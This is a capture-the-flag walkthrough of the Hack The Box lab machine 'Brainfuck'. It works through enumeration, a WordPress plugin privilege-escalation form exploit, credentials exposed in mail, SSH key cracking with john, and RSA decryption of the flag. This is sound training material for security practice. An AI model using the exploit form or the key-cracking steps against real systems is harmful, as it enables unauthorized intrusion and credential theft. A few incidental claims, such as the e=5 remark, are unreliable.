OSCP Path ~ Brainfuck from Hack The Box (VIP required)
Brainfuck ~ Hack The Box to OSCP
We run the first scan with Nmap
$ nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.17
We proceed with the next Nmap scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) UIDL USER TOP RESP-CODES PIPELINING AUTH-RESP-CODE CAPA
143/tcp open imap Dovecot imapd
|_imap-capabilities: Pre-login more IMAP4rev1 AUTH=PLAINA0001 have post-login listed ID OK LITERAL+ IDLE LOGIN-REFERRALS SASL-IR ENABLE capabilities
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel
We see that virtual hosting is in use (the host names come from the TLS certificate above):
brainfuck.htb, sup3rs3cr3t.brainfuck.htb
# whatweb https://brainfuck.htb
https://brainfuck.htb [200 OK] Bootstrap[4.7.3], Country[RESERVED][ZZ], Email[ajax-loader@2x.gif,orestis@brainfuck.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.10.0 (Ubuntu)], IP[10.10.10.17], JQuery[1.12.4], MetaGenerator[WordPress 4.7.3], Modernizr, PoweredBy[WordPress,], Script[text/javascript], Title[Brainfuck Ltd. – Just another WordPress site], UncommonHeaders[link], WordPress[4.7.3], nginx[1.10.0]
The whatweb run above shows that we are facing "WordPress 4.7.3".
Next we run a scan with the wpscan tool:
With --disable-tls-checks we tell it to skip the TLS checks
With -e vp (vulnerable plugins), u (users)
With -o <output file>
# wpscan --url https://brainfuck.htb/ --disable-tls-checks -e vp,u -o vpscan.txt
┌──(root💀kali)-[/home/…/HTB/OSCP/BrainFuck/nmap]
└─# cat vpscan.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.14
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Wed Jun 9 15:29:54 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.0 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: https://brainfuck.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: https://brainfuck.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
| Found By: Rss Generator (Passive Detection)
| - https://brainfuck.htb/?feed=rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
| - https://brainfuck.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
[+] WordPress theme in use: proficient
| Location: https://brainfuck.htb/wp-content/themes/proficient/
| Last Updated: 2021-05-09T00:00:00.000Z
| Readme: https://brainfuck.htb/wp-content/themes/proficient/readme.txt
| [!] The version is out of date, the latest version is 3.0.45
| Style URL: https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3
| Style Name: Proficient
| Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof...
| Author: Specia
| Author URI: https://speciatheme.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.6 (80% confidence)
| Found By: Style (Passive Detection)
| - https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3, Match: 'Version: 1.0.6'
[i] No plugins Found.
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] administrator
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Jun 9 15:30:02 2021
[+] Requests Done: 74
[+] Cached Requests: 6
[+] Data Sent: 17.288 KB
[+] Data Received: 16.927 MB
[+] Memory used: 224.105 MB
[+] Elapsed time: 00:00:07
We fuzz for directories with the DIRB tool
# dirb https://brainfuck.htb
-----------------
START_TIME: Wed Jun 9 15:37:50 2021
URL_BASE: https://brainfuck.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: https://brainfuck.htb/ ----
+ https://brainfuck.htb/index.php (CODE:301|SIZE:0)
==> DIRECTORY: https://brainfuck.htb/wp-admin/
==> DIRECTORY: https://brainfuck.htb/wp-content/
==> DIRECTORY: https://brainfuck.htb/wp-includes/
+ https://brainfuck.htb/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: https://brainfuck.htb/wp-admin/ ----
+ https://brainfuck.htb/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: https://brainfuck.htb/wp-admin/css/
==> DIRECTORY: https://brainfuck.htb/wp-admin/images/
==> DIRECTORY: https://brainfuck.htb/wp-admin/includes/
+ https://brainfuck.htb/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: https://brainfuck.htb/wp-admin/js/
==> DIRECTORY: https://brainfuck.htb/wp-admin/maint/
==> DIRECTORY: https://brainfuck.htb/wp-admin/network/
==> DIRECTORY: https://brainfuck.htb/wp-admin/user/
---- Entering directory: https://brainfuck.htb/wp-content/ ----
+ https://brainfuck.htb/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: https://brainfuck.htb/wp-content/plugins/
==> DIRECTORY: https://brainfuck.htb/wp-content/themes/
==> DIRECTORY: https://brainfuck.htb/wp-content/upgrade/
==> DIRECTORY: https://brainfuck.htb/wp-content/uploads/
---- Entering directory: https://brainfuck.htb/wp-includes/ ----
==> DIRECTORY: https://brainfuck.htb/wp-includes/certificates/
==> DIRECTORY: https://brainfuck.htb/wp-includes/css/
==> DIRECTORY: https://brainfuck.htb/wp-includes/customize/
==> DIRECTORY: https://brainfuck.htb/wp-includes/fonts/
==> DIRECTORY: https://brainfuck.htb/wp-includes/images/
==> DIRECTORY: https://brainfuck.htb/wp-includes/js/
==> DIRECTORY: https://brainfuck.htb/wp-includes/widgets/
---- Entering directory: https://brainfuck.htb/wp-admin/css/ ----
---- Entering directory: https://brainfuck.htb/wp-admin/images/ ----
---- Entering directory: https://brainfuck.htb/wp-admin/includes/ ----
+ https://brainfuck.htb/wp-admin/includes/admin.php (CODE:500|SIZE:0)
---- Entering directory: https://brainfuck.htb/wp-admin/js/ ----
---- Entering directory: https://brainfuck.htb/wp-admin/maint/ ----
---- Entering directory: https://brainfuck.htb/wp-admin/network/ ----
+ https://brainfuck.htb/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ https://brainfuck.htb/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: https://brainfuck.htb/wp-admin/user/ ----
+ https://brainfuck.htb/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ https://brainfuck.htb/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: https://brainfuck.htb/wp-content/plugins/ ----
---- Entering directory: https://brainfuck.htb/wp-content/themes/ ----
+ https://brainfuck.htb/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: https://brainfuck.htb/wp-content/upgrade/ ----
.....ctrl+c
We see that it reported wp-content/plugins/ but with no further results.
We try browsing directly to this path: https://brainfuck.htb/wp-content/plugins/
../
akismet/ 06-Mar-2017 16:00 -
easy-wp-smtp/ 17-Apr-2017 17:17 -
wp-support-plus-responsive-ticket-system/ 17-Apr-2017 17:51 -
hello.php 22-May-2013 21:08 2255
index.php.old
We find these resources, so we are going to look up the plugins in Searchsploit.
We obtain a readme.txt: https://brainfuck.htb/wp-content/plugins/easy-wp-smtp/readme.txt
We check https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
../
asset/ 17-Apr-2017 17:51 -
includes/ 17-Apr-2017 17:51 -
lang/ 17-Apr-2017 17:51 -
pipe/ 17-Apr-2017 17:51 -
readme.txt 17-Apr-2017 17:51 19938
wp-support-plus.php
From the readme.txt file we see that the plugin version is 7.1.3
# searchsploit wp support
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin WP Live Chat Support 6.2.03 - Persistent Cross-Site Scripting | php/webapps/40190.txt
WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities | php/webapps/34589.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation | php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection | php/webapps/40939.txt
---------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
There we see that it has a privilege escalation for version 7.1.3 (7.1.3 - Privilege Escalation), which looks interesting.
Access to WordPress as Admin using the exploit we found
Exploit found in SEARCHSPLOIT
wp support privilege escalation
We set the URL, the user name, and an email address
We open it with $ firefox /HTB/OSCP/BrainFuck/exploits/exploit.html
and log in.
$ cat /HTB/OSCP/BrainFuck/exploits/exploit.html
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="admin">
<input type="hidden" name="email" value="orestis@brainfuck.htb">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
We get access to the WordPress panel as Admin. Logged in to the WordPress CMS as the admin user,
we manage to extract the credentials for the SMTP service, so we continue from there.
# telnet 10.10.10.17 110
Trying 10.10.10.17...
Connected to 10.10.10.17.
Escape character is '^]'.
+OK Dovecot ready.
-ERR Unknown command.
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
list
+OK 2 messages:
1 977
2 514
# We retrieve the first mail found with the RETR 1 command
retr 1
+OK 977 octets
Return-Path: <www-data@brainfuck.htb>
X-Original-To: orestis@brainfuck.htb
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 33)
id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <wordpress@brainfuck.htb>
Message-ID: <00edcd034a67f3b0b6b43bab82b0f872@brainfuck.htb>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Your new WordPress site has been successfully set up at:
https://brainfuck.htb
You can log in to the administrator account with the following information:
Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php
We hope you enjoy your new site. Thanks!
--The WordPress Team
https://wordpress.org/
.
exit
-ERR Unknown command: EXIT
# We retrieve the second mail with the RETR 2 command
retr 2
+OK 514 octets
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)
Hi there, your credentials for our "secret" forum are below :)
username: orestis
password: kIEnnfEKJ#9UmdO
Regards
.
We manage to get into the super secret forum https://sup3rs3cr3t.brainfuck.htb/d/1-development
with the credentials obtained from the mail service.
We enter the forum:
https://sup3rs3cr3t.brainfuck.htb/d/3-key
We find an open discussion and see that a cipher is being applied that appears to be Vigenère:
# We find patterns that seem to repeat, which is exactly the weakness of Vigenère
Orestis - Hacking for fun and profit
Pieagnm - Jkoijeg nbw zwx mle grwsnn
Vigenère cipher: the weakness is that you can look for repeating or similar patterns to recover the key (below) http://rumkin.com/tools/cipher/vigenere.php
Brain fuCkmybrain fuckmybrain fu
With the password fuckmybrain
we gradually decrypt the messages
until we find this relevant one:
There you go you stupid fuck, I hope you remember your key password because I dont https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
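Why the repeated signature line breaks the cipher, as an added example that is not part of the original write-up: subtracting the known plaintext from the ciphertext yields the keystream, and its shortest period is the key up to rotation. The function names are illustrative; the two strings are the pair quoted from the forum above.

```python
import string

ALPHA = string.ascii_lowercase

# Signature pair quoted from the forum thread above.
KNOWN_PLAIN = "Orestis - Hacking for fun and profit"
KNOWN_CIPHER = "Pieagnm - Jkoijeg nbw zwx mle grwsnn"


def recover_keystream(plain: str, cipher: str) -> str:
    """Key letter = (cipher - plain) mod 26 at every alphabetic position."""
    if len(plain) != len(cipher):
        raise ValueError("plaintext and ciphertext must have the same length")
    out = []
    for p, c in zip(plain.lower(), cipher.lower()):
        if p in ALPHA and c in ALPHA:
            out.append(ALPHA[(ALPHA.index(c) - ALPHA.index(p)) % 26])
        elif p != c:
            raise ValueError("non-letters must line up in both texts")
    return "".join(out)


def smallest_period(stream: str) -> int:
    """Shortest L such that stream[i] == stream[i - L] for every i >= L."""
    for length in range(1, len(stream) + 1):
        if all(stream[i] == stream[i - length] for i in range(length, len(stream))):
            return length
    return len(stream)


def rotations(block: str) -> list:
    """All cyclic rotations of one keystream period (candidate keys)."""
    return [block[i:] + block[:i] for i in range(len(block))]


def vigenere_decrypt(cipher: str, key: str, offset: int = 0) -> str:
    """Decrypt, advancing the key only on letters and preserving case."""
    out, k = [], offset
    for ch in cipher:
        if ch.lower() in ALPHA:
            shift = ALPHA.index(key[k % len(key)])
            plain = ALPHA[(ALPHA.index(ch.lower()) - shift) % 26]
            out.append(plain.upper() if ch.isupper() else plain)
            k += 1
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    ks = recover_keystream(KNOWN_PLAIN, KNOWN_CIPHER)
    period = smallest_period(ks)
    print("keystream :", ks)
    print("period    :", period)
    print("candidates:", rotations(ks[:period]))
```

The keystream starts mid-key because the signature sits at the end of a longer message, so the key appears as one of the rotations rather than at position 0.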
We obtain an id_rsa file, but it is encrypted, so we will have to use the ssh2john.py tool,
which converts the key into a hash format that john
can understand for brute forcing.
# locate 2john | grep ssh
/usr/share/john/ssh2john.py
# Step 1
(root💀kali)-[/home/…/HTB/OSCP/BrainFuck/content]
└─# /usr/share/john/ssh2john.py id_rsa > "hash_rsa"
# Step 2
┌──(root💀kali)-[/home/…/HTB/OSCP/BrainFuck/content]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt "hash_rsa"
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
"3poulakia! " (id_rsa)
Warning: Only 5 candidates left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2021-06-09 18:18) 0.4201g/s 6025Kp/s 6025Kc/s 6025KC/s *7¡Vamos!..rootpassword!
Session completed
Getting Initial Access over SSH
# ssh -i id_rsa orestis@brainfuck.htb 255 ⨯
The authenticity of host 'brainfuck.htb (10.10.10.17)' can't be established.
ECDSA key fingerprint is SHA256:S+b+YyJ/+y9IOr9GVEuonPnvVx4z7xUveQhJknzvBjg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'brainfuck.htb' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
You have mail.
Last login: Wed May 3 19:46:00 2017 from 10.10.11.4
orestis@brainfuck:~$
Privesc / System Enumeration
We enumerate:
orestis@brainfuck:~$ ls
debug.txt encrypt.sage mail output.txt "user.txt"
We read the flag from user.txt
and keep enumerating the other resources
orestis@brainfuck:~$ cat debug.txt
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
orestis@brainfuck:~$ cat output.txt
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
Let's see what the script that leaves us these files full of decimal digits actually does
orestis@brainfuck:~$ cat encrypt.sage
nbits = 1024
password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))
p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)
c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
Since we don't know what it is doing, we copy part of the code to see whether we can identify the type of encryption being used
p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False) "[GOOGLE SEARCH]"
It seems that: It is a standard RSA with e=5 an
found at https://ctftime.org/writeup/6434
And we find a script that does the RSA calculation from the variables p, q and e
https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e
We set the script up with our values from the files debug.txt
and output.txt
# cat decrypt.py 1 ⨯
#!/usr/bin/python
# Extended Euclidean algorithm: returns (gcd, x, y) such that a*x + b*y == gcd
def egcd(a, b):
    x,y, u,v = 0,1, 1,0
    while a != 0:
        q, r = b//a, b%a
        m, n = x-u*q, y-v*q
        b,a, x,y, u,v = a,r, u,v, m,n
    gcd = b
    return gcd, x, y

# Main function: p, q and e are the values from debug.txt, ct is the value from output.txt
def main():
    p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
    q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
    e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
    ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
    # Compute n
    n = p * q
    # Compute phi(n)
    phi = (p - 1) * (q - 1)
    # Compute the modular inverse of e, reduced mod phi so that d is never negative
    gcd, a, b = egcd(e, phi)
    d = a % phi
    # The label says "n", but the value printed here is the private exponent d
    print( "n: " + str(d) )
    # Decrypt ciphertext
    pt = pow(ct, d, n)
    print( "pt: " + str(pt) )

if __name__ == "__main__":
    main()
Once everything is set, we run the script to see whether it computes the value we are after.
# python decrypt.py 1 ⚙
n: 8730619434505424202695243393110875299824837916005183495711605871599704226978295096241357277709197601637267370957300267235576794588910779384003565449171336685547398771618018696647404657266705536859125227436228202269747809884438885837599321762997276849457397006548009824608365446626232570922018165610149151977
# This is the value we want, pt, which is given in decimal
pt: 24604052029401386049980296953784287079059245867880966944246662849341507003750
Now we have to convert this value from decimal to hexadecimal and then to plain text.
For that we use this web page:
https://www.rapidtables.com/convert/number/decimal-to-hex.html
First, decimal to hex
Output: 3665666331613564626238393034373531636536353636613330356262386566
Then hex to text
Output: 6efc1a5dbb8904751ce6566a305bbxxxx
Which appears to be the root.txt flag
BRAINFUCK machine
rooted =D !! On to more hacks !!
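The whole root step end to end, as an added example that is not part of the original write-up: a Python equivalent of encrypt.sage run on constructed values, followed by the recovery from the leaked (p, q, e) and the decimal-to-text conversion done above with a web page. The primes, the secret and all function names are assumptions made for illustration.

```python
import math
import random

# Constructed values: two well-known Mersenne primes stand in for p and q,
# and SECRET stands in for the file that encrypt.sage reads.
P = 2**127 - 1
Q = 2**89 - 1
SECRET = "constructed-secret-123"


def encrypt_like_sage(secret: str, p: int, q: int, seed: int = 0):
    """Mirror of encrypt.sage: returns (c, debug) with debug = (p, q, e)."""
    # Same value as int(password.encode('hex'), 16) in the Sage script.
    m = int.from_bytes(secret.encode("ascii"), "big")
    n, phi = p * q, (p - 1) * (q - 1)
    if m >= n:
        raise ValueError("message must be smaller than the modulus")
    rng = random.Random(seed)
    e = rng.randrange(2, phi)
    while math.gcd(e, phi) != 1:      # same retry loop as the Sage script
        e = rng.randrange(2, phi)
    # Writing p, q and e next to the ciphertext is the flaw: together they
    # are equivalent to the private key.
    return pow(m, e, n), (p, q, e)


def int_to_text(m: int) -> str:
    """Decimal integer -> big-endian bytes -> text (decimal -> hex -> text)."""
    raw = m.to_bytes((m.bit_length() + 7) // 8, "big")
    return raw.decode("ascii")


def recover_from_debug(c: int, p: int, q: int, e: int) -> str:
    """Rebuild d from the leaked debug values and decrypt c."""
    n, phi = p * q, (p - 1) * (q - 1)
    d = pow(e, -1, phi)               # modular inverse (Python 3.8+), in [0, phi)
    return int_to_text(pow(c, d, n))


if __name__ == "__main__":
    c, debug = encrypt_like_sage(SECRET, P, Q)
    print("ciphertext:", c)
    print("recovered :", recover_from_debug(c, *debug))
```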